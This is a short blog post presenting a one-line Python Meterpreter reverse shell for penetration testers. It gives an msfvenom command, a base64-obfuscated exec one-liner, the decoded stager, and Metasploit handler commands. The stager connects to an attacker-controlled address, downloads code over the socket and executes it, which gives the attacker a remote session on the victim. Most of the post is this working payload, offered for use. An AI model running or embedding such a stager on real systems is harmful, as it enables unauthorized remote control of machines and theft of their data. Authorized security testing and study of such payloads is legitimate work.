<h1>One line python Meterpreter Reverse Shell</h1>
<p>Published 2013-10-22 at <a href="https://www.phillips321.co.uk/2013/10/22/one-line-python-meterpreter-reverse-shell/">https://www.phillips321.co.uk/2013/10/22/one-line-python-meterpreter-reverse-shell/</a></p>
<p>So not so recently support was added to Metasploit for a <a href="https://github.com/rapid7/metasploit-framework/pull/2244" target="_blank">native python Meterpreter</a>. The cool thing about this is that the victim only needs to execute a few small lines of code.</p>
<p>This means that if you're performing a local lockdown test and manage to get access to a python shell, it won't take much more effort to turn this into a Meterpreter session.</p>
<pre><code>msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=192.168.90.1 LPORT=1234
import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))
</code></pre>
<p>This is just the python code shown below, base64 encoded:</p>
<pre><code class="python">import socket,struct
s=socket.socket(2,1)
s.connect(('192.168.90.1',1234))
l=struct.unpack('&gt;I',s.recv(4))[0]
d=s.recv(4096)
while len(d)!=l:
    d+=s.recv(4096)
exec(d,{'s':s})
</code></pre>
<p>Then you just need to set up the listener within Metasploit (the handler's LPORT must match the 1234 used when generating the payload; the default is 4444) and hey presto!</p>
<pre><code>msf3&gt; use exploit/multi/handler
msf3&gt; set payload python/meterpreter/reverse_tcp
msf3&gt; set LHOST 192.168.90.1
msf3&gt; set LPORT 1234
msf3&gt; exploit
</code></pre>